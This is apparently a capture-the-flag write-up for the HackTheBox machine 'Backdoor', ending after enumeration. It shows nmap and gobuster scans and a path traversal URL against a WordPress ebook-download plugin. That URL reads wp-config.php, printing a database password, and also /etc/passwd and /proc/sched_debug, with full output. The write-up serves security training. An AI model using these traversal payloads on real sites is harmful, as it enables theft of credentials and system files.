#Enum

nmap

# Nmap 7.92 scan initiated Mon Nov 22 09:28:52 2021 as: nmap -sCV -p22,80,1337 -oN nmap_open_tcp 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.028s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_http-generator: WordPress 5.8.1
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 22 09:29:11 2021 -- 1 IP address (1 host up) scanned in 18.85 seconds

Web enumeration

We begin with adding backdoor.htb to our hosts file.

Next we begin with running gobuster

/wp-content           (Status: 301) [Size: 317] [--> http://10.10.11.125/wp-content/]
/wp-includes          (Status: 301) [Size: 318] [--> http://10.10.11.125/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]
/wp-admin             (Status: 301) [Size: 315] [--> http://10.10.11.125/wp-admin/]
/index.php            (Status: 301) [Size: 0] [--> http://10.10.11.125/]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-login.php         (Status: 200) [Size: 5674]
/license.txt          (Status: 200) [Size: 19915]
/server-status        (Status: 403) [Size: 277]
/wp-config.php        (Status: 200) [Size: 0]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://10.10.11.125/wp-login.php?action=register]
/index.php            (Status: 301) [Size: 0] [--> http://10.10.11.125/]

Running wpscan doesn’t show any plugins at all.

However if we manually visit /wp-content/plugins/ we find

Using searchsploit we find this

backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

We get


/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' ); ****

We can enumerate users by looking at /etc/passwd

../../../../../../etc/passwd../../../../../../etc/passwd../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false

We can enumerate running services by looking at /proc/sched_debug.

HTTP/1.1 200 OK

Date: Mon, 22 Nov 2021 10:03:18 GMT

Server: Apache/2.4.41 (Ubuntu)

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="sched_debug"

Connection: close

Content-Type: application/octet-stream

Content-Length: 45512



../../../../../../proc/sched_debug../../../../../../proc/sched_debug../../../../../../proc/sched_debugSched Debug Version: v0.11, 5.4.0-80-generic #90-Ubuntu
ktime                                   : 7836321.421994
sched_clk                               : 7836419.707908
cpu_clk                                 : 7836395.465785
jiffies                                 : 4296851359
sched_clock_stable()                    : 1

sysctl_sched
  .sysctl_sched_latency                    : 12.000000
  .sysctl_sched_min_granularity            : 1.500000
  .sysctl_sched_wakeup_granularity         : 2.000000
  .sysctl_sched_child_runs_first           : 0
  .sysctl_sched_features                   : 2059067
  .sysctl_sched_tunable_scaling            : 1 (logarithmic)

cpu#0, 2994.375 MHz
  .nr_running                    : 0
  .nr_switches                   : 3663620
  .nr_load_updates               : 0
  .nr_uninterruptible            : 5
  .next_balance                  : 4296.851360
  .curr->pid                     : 0
  .clock                         : 7836394.013091
  .clock_task                    : 7836394.013091
  .avg_idle                      : 1000000
  .max_idle_balance_cost         : 500000

cfs_rq[0]:/autogroup-79
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 88077.432458
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -2341672.383216
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 1
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 1
  .tg_load_avg                   : 4
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 7836369.394642
  .se->vruntime                  : 2429745.933893
  .se->sum_exec_runtime          : 206018.385671
  .se->load.weight               : 524288
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-36
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 4227.066453
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -2425522.749221
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 1
  .runnable_load_avg             : 0
  .util_avg                      : 1
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 1
  .tg_load_avg                   : 1
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 7836364.287315
  .se->vruntime                  : 2429745.546911
  .se->sum_exec_runtime          : 4337.232765
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-37
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 256.036421
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -2429493.779253
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 7836076.538957
  .se->vruntime                  : 2429742.807551
  .se->sum_exec_runtime          : 262.785539
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/autogroup-58
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 50879.641931
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -2378870.173743
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 496
  .runnable_load_avg             : 0
  .util_avg                      : 252
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 496
  .tg_load_avg                   : 500
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 7836358.926113
  .se->vruntime                  : 2429749.815674
  .se->sum_exec_runtime          : 13108.153684
  .se->load.weight               : 1042467
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 493
  .se->avg.util_avg              : 255
  .se->avg.runnable_load_avg     : 0

cfs_rq[0]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 2429749.815674
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 0.000000
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 497
  .runnable_load_avg             : 0
  .util_avg                      : 260
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[0]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.018254
  .rt_runtime                    : 950.000000

dl_rq[0]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S       kthreadd     2   2427221.387810       302   120         0.000000         6.881525         0.000000 0 0 /
 I         rcu_gp     3        13.977113         2   100         0.000000         0.005490         0.000000 0 0 /
 I     rcu_par_gp     4        15.977274         2   100         0.000000         0.002585         0.000000 0 0 /
 I   kworker/0:0H     6      3207.991475         4   100         0.000000         0.023003         0.000000 0 0 /
 I   mm_percpu_wq     9        22.048949         2   100         0.000000         0.003095         0.000000 0 0 /
 S    ksoftirqd/0    10   2429725.046222     62581   120         0.000000      2799.971177         0.000000 0 0 /
 I      rcu_sched    11   2429743.866779    431395   120         0.000000      4744.103445         0.000000 0 0 /
 S    migration/0    12         0.000000      2943     0         0.000000        45.626472         0.000000 0 0 /
 S  idle_inject/0    13         0.000000         3    49         0.000000         0.007465         0.000000 0 0 /
 S        cpuhp/0    14      5936.121573         9   120         0.000000         0.251392         0.000000 0 0 /
 S      kdevtmpfs    21      6082.255777       188   120         0.000000         5.077007         0.000000 0 0 /
 I        ata_sff    83       629.114439         2   100         0.000000         0.000000         0.000000 0 0 /
 I    edac-poller    85       635.114436         2   100         0.000000         0.000000         0.000000 0 0 /
 S      watchdogd    87         5.999997         2     0         0.000000         0.000000         0.000000 0 0 /
 S        kswapd0    90      1043.168884         3   120         0.000000         0.072165         0.000000 0 0 /
 Secryptfs-kthrea    91       884.978489         2   120         0.000000         0.043491         0.000000 0 0 /
 I       kthrotld    93       893.234198         2   100         0.000000         0.179326         0.000000 0 0 /
 S  irq/24-pciehp    94         0.000000         2    49         0.000000         0.052468         0.000000 0 0 /
 S  irq/26-pciehp    96         0.000000         2    49         0.000000         0.040065         0.000000 0 0 /
 S  irq/28-pciehp    98         0.000000         2    49         0.000000         0.035796         0.000000 0 0 /
 S  irq/30-pciehp   100         0.000000         2    49         0.000000         0.051977         0.000000 0 0 /
 S  irq/32-pciehp   102         0.000000         2    49         0.000000         0.021150         0.000000 0 0 /
 S  irq/34-pciehp   104         0.000000         2    49         0.000000         0.039603         0.000000 0 0 /
 S  irq/36-pciehp   106         0.000000         2    49         0.000000         0.036579         0.000000 0 0 /
 S  irq/38-pciehp   108         0.000000         2    49         0.000000         0.054642         0.000000 0 0 /
 S  irq/40-pciehp   110         0.000000         2    49         0.000000         0.025727         0.000000 0 0 /
 S  irq/42-pciehp   112         0.000000         2    49         0.000000         0.034867         0.000000 0 0 /
 S  irq/44-pciehp   114         0.000000         2    49         0.000000         0.062609         0.000000 0 0 /
 S  irq/46-pciehp   116         0.000000         2    49         0.000000         0.070673         0.000000 0 0 /
 S  irq/48-pciehp   118         0.000000         2    49         0.000000         0.141276         0.000000 0 0 /
 S  irq/50-pciehp   120         0.000000         2    49         0.000000         0.181310         0.000000 0 0 /
 S  irq/52-pciehp   122         0.000000         2    49         0.000000         0.062748         0.000000 0 0 /
 S  irq/54-pciehp   124         0.000000         2    49         0.000000         0.167864         0.000000 0 0 /
 Iacpi_thermal_pm   126      1027.066123         2   100         0.000000         0.054653         0.000000 0 0 /
 S      scsi_eh_0   127      1086.037819         4   120         0.000000        12.750416         0.000000 0 0 /
 I     scsi_tmf_0   128      1035.101745         2   100         0.000000         0.019106         0.000000 0 0 /
 S      scsi_eh_1   129      1086.053809         4   120         0.000000        12.526678         0.000000 0 0 /
 I     scsi_tmf_1   130      1043.144780         2   100         0.000000         0.017924         0.000000 0 0 /
 Ivfio-irqfd-clea   132      1049.156942         2   100         0.000000         0.014086         0.000000 0 0 /
 I kworker/u257:0   146      1072.188753         2   100         0.000000         0.011863         0.000000 0 0 /
 S      scsi_eh_2   201      2790.211331        25   120         0.000000         2.349327         0.000000 0 0 /
 I     scsi_tmf_2   202      1498.612212         2   100         0.000000         0.008496         0.000000 0 0 /
 I     scsi_tmf_3   204      1514.316008         2   100         0.000000         0.009417         0.000000 0 0 /
 I     scsi_tmf_4   206      1541.753586         2   100         0.000000         0.009358         0.000000 0 0 /
 I     scsi_tmf_5   208      1558.147819         2   100         0.000000         0.008025         0.000000 0 0 /
 I     scsi_tmf_6   210      1573.774527         2   100         0.000000         0.007043         0.000000 0 0 /
 I     scsi_tmf_7   212      1589.119357         2   100         0.000000         0.008165         0.000000 0 0 /
 I     scsi_tmf_8   214      1604.704358         2   100         0.000000         0.006753         0.000000 0 0 /
 I     scsi_tmf_9   216      1620.087637         2   100         0.000000         0.009427         0.000000 0 0 /
 S     scsi_eh_10   217      2789.248907        26   120         0.000000         1.184683         0.000000 0 0 /
 I    scsi_tmf_10   218      1635.802219         2   100         0.000000         0.008536         0.000000 0 0 /
 I    scsi_tmf_11   226      1655.897977         2   100         0.000000         0.008706         0.000000 0 0 /
 I    scsi_tmf_12   230      1672.030103         2   100         0.000000         0.016902         0.000000 0 0 /
 S     scsi_eh_13   232      2790.028067        26   120         0.000000         1.947881         0.000000 0 0 /
 S     scsi_eh_14   242      2789.086071        26   120         0.000000         1.075537         0.000000 0 0 /
 I    scsi_tmf_15   245      1752.621623         2   100         0.000000         0.011111         0.000000 0 0 /
 S     scsi_eh_16   246      2789.485670        26   120         0.000000         1.472564         0.000000 0 0 /
 I    scsi_tmf_16   247      1769.157375         2   100         0.000000         0.008907         0.000000 0 0 /
 S     scsi_eh_17   248      2789.600756        26   120         0.000000         1.609039         0.000000 0 0 /
 I    scsi_tmf_17   249      1793.536543         2   100         0.000000         0.006712         0.000000 0 0 /
 S     scsi_eh_18   250      2789.311243        26   120         0.000000         1.294989         0.000000 0 0 /
 I    scsi_tmf_18   251      1816.873874         2   100         0.000000         0.006031         0.000000 0 0 /
 I    scsi_tmf_20   268      1843.606856         3   100         0.000000         0.017082         0.000000 0 0 /
 S     scsi_eh_21   269      2789.245179        26   120         0.000000         1.280938         0.000000 0 0 /
 S     scsi_eh_22   274      2789.220032        26   120         0.000000         1.201212         0.000000 0 0 /
 S     scsi_eh_23   276      2790.868552        26   120         0.000000         2.842527         0.000000 0 0 /
 S     scsi_eh_24   278      2789.977613        26   120         0.000000         2.065432         0.000000 0 0 /
 S     scsi_eh_26   282      2789.702465        26   120         0.000000         1.643610         0.000000 0 0 /
 S     scsi_eh_29   288      2789.122439        26   120         0.000000         1.072863         0.000000 0 0 /
 S     scsi_eh_30   290      2789.712415        26   120         0.000000         1.678656         0.000000 0 0 /
 S  irq/16-vmwgfx   297         0.001122     32633    49         0.000000       859.924299         0.000000 0 0 /
 I       kdmflush   339      2876.361743         2   100         0.000000         0.125355         0.000000 0 0 /
 I   kworker/0:1H   426   2429742.713046      7630   100         0.000000       199.330628         0.000000 0 0 /
 Iext4-rsv-conver   429      3218.378625         2   100         0.000000         0.005981         0.000000 0 0 /
 S  systemd-udevd   512      1766.185386      2695   120         0.000000       549.138141         0.000000 0 0 /autogroup-15
 Ssystemd-network   527        64.725816       410   120         0.000000       228.074910         0.000000 0 0 /autogroup-16
 I   kmpath_rdacd   652      5947.268946         2   100         0.000000         0.026990         0.000000 0 0 /
 S     multipathd   656         0.000000      1571     0         0.000000        70.134716         0.000000 0 0 /autogroup-24
 S     multipathd   659         0.000000     12196     0         0.000000      3489.143014         0.000000 0 0 /autogroup-24
 S     multipathd   660         0.000000        14     0         0.000000         7.260793         0.000000 0 0 /autogroup-24
 S     multipathd   661         0.000000         8     0         0.000000         0.324037         0.000000 0 0 /autogroup-24
 S    jbd2/sda2-8   663      7226.205561        14   120         0.000000         0.309218         0.000000 0 0 /
 Iext4-rsv-conver   664      6007.563500         2   100         0.000000         0.008305         0.000000 0 0 /
 S  VGAuthService   698        17.458136        96   120         0.000000        19.423311         0.000000 0 0 /autogroup-35
 S       vmtoolsd   702      4227.066453     85549   120         0.000000     12070.944899         0.000000 0 0 /autogroup-36
 S   HangDetector   750      4221.050384      7941   120         0.000000       273.480296         0.000000 0 0 /autogroup-36
 S       vmtoolsd   751       582.238399       145   120         0.000000         1.802407         0.000000 0 0 /autogroup-36
 Saccounts-daemon   761       174.737197       135   120         0.000000        16.609791         0.000000 0 0 /autogroup-37
 S          gmain   768       256.036421      7117   120         0.000000       450.460951         0.000000 0 0 /autogroup-37
 S          gdbus   925       175.267902        91   120         0.000000        10.179252         0.000000 0 0 /autogroup-37
 S    dbus-daemon   763        57.951990      1072   120         0.000000       392.162645         0.000000 0 0 /autogroup-38
 S     irqbalance   789       368.927472       796   120         0.000000       431.478821         0.000000 0 0 /autogroup-41
 S       rsyslogd   793       139.583843        41   120         0.000000         7.686103         0.000000 0 0 /autogroup-44
 S      in:imklog   867       107.564591        14   120         0.000000         4.078256         0.000000 0 0 /autogroup-44
 S  rs:main Q:Reg   868       146.380282      3827   120         0.000000       194.209635         0.000000 0 0 /autogroup-44
 S systemd-logind   797        75.140354       773   120         0.000000       132.383882         0.000000 0 0 /autogroup-42
 S           cron   821         5.565736        41   120         0.000000         4.942609         0.000000 0 0 /autogroup-52
 S           cron   822         5.532710        37   120         0.000000         3.519258         0.000000 0 0 /autogroup-52
 S           sshd   857        21.682502        45   120         0.000000        21.557915         0.000000 0 0 /autogroup-64
 S         agetty   934        -1.701961        15   120         0.000000         5.506836         0.000000 0 0 /autogroup-85
 S          gmain   946         1.299633         2   120         0.000000         0.072656         0.000000 0 0 /autogroup-75
 S          gdbus   948        13.118957       125   120         0.000000        13.052975         0.000000 0 0 /autogroup-75
 S       (sd-pam)   952         0.295675         1   120         0.000000         0.251792         0.000000 0 0 /autogroup-76
 S           bash   955        26.080676        62   120         0.000000        27.338524         0.000000 0 0 /autogroup-78
 S         mysqld   963     87826.198725     70517   120         0.000000      3424.818561         0.000000 0 0 /autogroup-79
 S     ib_io_ibuf  1004     88071.374257     15440   120         0.000000       229.432519         0.000000 0 0 /autogroup-79
 S      ib_io_log  1005     88071.386380     15447   120         0.000000       306.535212         0.000000 0 0 /autogroup-79
 S     ib_io_rd-1  1006     88071.375130     15442   120         0.000000       507.946246         0.000000 0 0 /autogroup-79
 S     ib_io_rd-2  1007     88071.377123     15444   120         0.000000       224.626111         0.000000 0 0 /autogroup-79
 S     ib_io_rd-3  1008     88071.409384     15437   120         0.000000       243.316359         0.000000 0 0 /autogroup-79
 S     ib_io_rd-4  1009     88071.373857     15440   120         0.000000       218.934252         0.000000 0 0 /autogroup-79
 S     ib_io_wr-1  1010     88071.373857     15642   120         0.000000       302.438949         0.000000 0 0 /autogroup-79
 S     ib_io_wr-4  1013     88071.380069     15644   120         0.000000       334.800438         0.000000 0 0 /autogroup-79
 S ib_pg_flush_co  1014     88071.199410      8243   120         0.000000       442.160891         0.000000 0 0 /autogroup-79
 S ib_log_checkpt  1015     88071.427217      7887   120         0.000000       324.022165         0.000000 0 0 /autogroup-79
 Sib_log_fl_notif  1016     88077.432458     75004   120         0.000000      2423.165450         0.000000 0 0 /autogroup-79
 S ib_srv_lock_to  1024     88071.247650      7835   120         0.000000       247.400488         0.000000 0 0 /autogroup-79
 S ib_srv_err_mon  1025     88071.221151      7765   120         0.000000       261.462362         0.000000 0 0 /autogroup-79
 S     ib_srv_mon  1026     88070.383961      1565   120         0.000000        61.709286         0.000000 0 0 /autogroup-79
 S  ib_buf_resize  1027       549.195035         1   120         0.000000         0.027902         0.000000 0 0 /autogroup-79
 S    ib_src_main  1028     88071.368767      7835   120         0.000000       778.341195         0.000000 0 0 /autogroup-79
 S  ib_dict_stats  1029     88068.251022       783   120         0.000000        31.415599         0.000000 0 0 /autogroup-79
 S     ib_fts_opt  1030     88069.878373      1562   120         0.000000        65.289905         0.000000 0 0 /autogroup-79
 S    ib_buf_dump  1037       602.914410         8   120         0.000000         0.950432         0.000000 0 0 /autogroup-79
 S      evt_sched  1043       630.126496         3   120         0.000000         0.810800         0.000000 0 0 /autogroup-79
 S    sig_handler  1044       625.398113         2   120         0.000000         0.138169         0.000000 0 0 /autogroup-79
 S   xpl_accept-2  1045       629.438536         2   120         0.000000         0.047208         0.000000 0 0 /autogroup-79
 S     connection 12491     87767.614996    109163   120         0.000000     20888.077337         0.000000 0 0 /autogroup-79
 S     connection 12493     87751.097057    109224   120         0.000000     20221.918665         0.000000 0 0 /autogroup-79
 S     connection 12499     87676.989962    109381   120         0.000000     20144.730468         0.000000 0 0 /autogroup-79
 S     connection 12530     87763.868558    108757   120         0.000000     20335.643328         0.000000 0 0 /autogroup-79
 S     connection 12540     87750.400397    108909   120         0.000000     20489.175885         0.000000 0 0 /autogroup-79
 S        apache2 10132    385402.023057    168659   120         0.000000    130672.814544         0.000000 0 0 /autogroup-72
 S        apache2 10151    385402.491854    161794   120         0.000000    125048.861680         0.000000 0 0 /autogroup-72
 S        apache2 10203    385402.971884    160932   120         0.000000    127331.575485         0.000000 0 0 /autogroup-72
 I    kworker/0:2 13154   2429745.269481     30686   120         0.000000      2769.744942         0.000000 0 0 /
 I kworker/u256:2 16066   2427221.509959      5428   120         0.000000       188.788151         0.000000 0 0 /
 S      gdbserver 16356         5.093942        15   120         0.000000         3.378794         0.000000 0 0 /autogroup-122
 t           true 16366         9.917977         3   120         0.000000         1.533446         0.000000 0 0 /autogroup-122
 S        apache2 16769    385401.896908      7384   120         0.000000      4627.892717         0.000000 0 0 /autogroup-72
 I    kworker/0:1 17589   2425162.653322         3   120         0.000000         0.017051         0.000000 0 0 /
 I kworker/u256:1 20464   2429742.901808      1303   120         0.000000        48.782137         0.000000 0 0 /
 S        apache2 20506    385401.696381      1299   120         0.000000       317.350861         0.000000 0 0 /autogroup-72
 S          sleep 21082     50879.641931         1   120         0.000000         0.891191         0.000000 0 0 /autogroup-58

cpu#1, 2994.375 MHz
  .nr_running                    : 1
  .nr_switches                   : 3784294
  .nr_load_updates               : 0
  .nr_uninterruptible            : -5
  .next_balance                  : 4296.851358
  .curr->pid                     : 17808
  .clock                         : 7836394.949357
  .clock_task                    : 7836394.949357
  .avg_idle                      : 1000000
  .max_idle_balance_cost         : 500000

cfs_rq[1]:/autogroup-79
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 103400.933641
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -2326348.882033
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 3
  .runnable_load_avg             : 0
  .util_avg                      : 1
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 3
  .tg_load_avg                   : 4
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 7836365.226316
  .se->vruntime                  : 2449252.889760
  .se->sum_exec_runtime          : 258784.857390
  .se->load.weight               : 524288
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 1
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/autogroup-58
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 55439.717529
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -2374310.098145
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 4
  .runnable_load_avg             : 0
  .util_avg                      : 4
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 4
  .tg_load_avg                   : 500
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 7836358.067323
  .se->vruntime                  : 2449258.810697
  .se->sum_exec_runtime          : 12706.245556
  .se->load.weight               : 6108
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 4
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/autogroup-72
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 386850.756858
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -2042899.058816
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 7836394.949357
  .se->vruntime                  : 2449252.810697
  .se->sum_exec_runtime          : 1278244.248737
  .se->load.weight               : 1048576
  .se->runnable_weight           : 1048576
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 2449258.810697
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 19508.995023
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 5
  .util_est_enqueued             : 23
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[1]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.000000
  .rt_runtime                    : 950.000000

dl_rq[1]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1       741.926874      4282   120         0.000000      2605.116078         0.000000 0 0 /autogroup-2
 S        cpuhp/1    15      5443.239188         9   120         0.000000         0.122371         0.000000 0 0 /
 S  idle_inject/1    16        -3.000000         3    49         0.000000         0.001553         0.000000 0 0 /
 S    migration/1    17         0.000000      3333     0         0.000000       143.885696         0.000000 0 0 /
 S    ksoftirqd/1    18   2449240.739085     61299   120         0.000000      2237.980622         0.000000 0 0 /
 I   kworker/1:0H    20      1703.482541         5   100         0.000000         0.044453         0.000000 0 0 /
 I          netns    22         6.965378         2   100         0.000000         0.000000         0.000000 0 0 /
 Srcu_tasks_kthre    23         6.965378         2   120         0.000000         0.000000         0.000000 0 0 /
 S        kauditd    24      5725.619973         9   120         0.000000         0.187140         0.000000 0 0 /
 S     khungtaskd    26   2447341.405763        66   120         0.000000        13.076491         0.000000 0 0 /
 S     oom_reaper    27        14.986646         2   120         0.000000         0.000000         0.000000 0 0 /
 I      writeback    28        14.986646         2   100         0.000000         0.000000         0.000000 0 0 /
 S     kcompactd0    29        14.986646         2   120         0.000000         0.000000         0.000000 0 0 /
 S           ksmd    30        14.986646         2   125         0.000000         0.000000         0.000000 0 0 /
 S     khugepaged    31        14.986646         2   139         0.000000         0.000000         0.000000 0 0 /
 I    kintegrityd    78        31.009996         2   100         0.000000         0.000000         0.000000 0 0 /
 I        kblockd    79        31.009996         2   100         0.000000         0.000000         0.000000 0 0 /
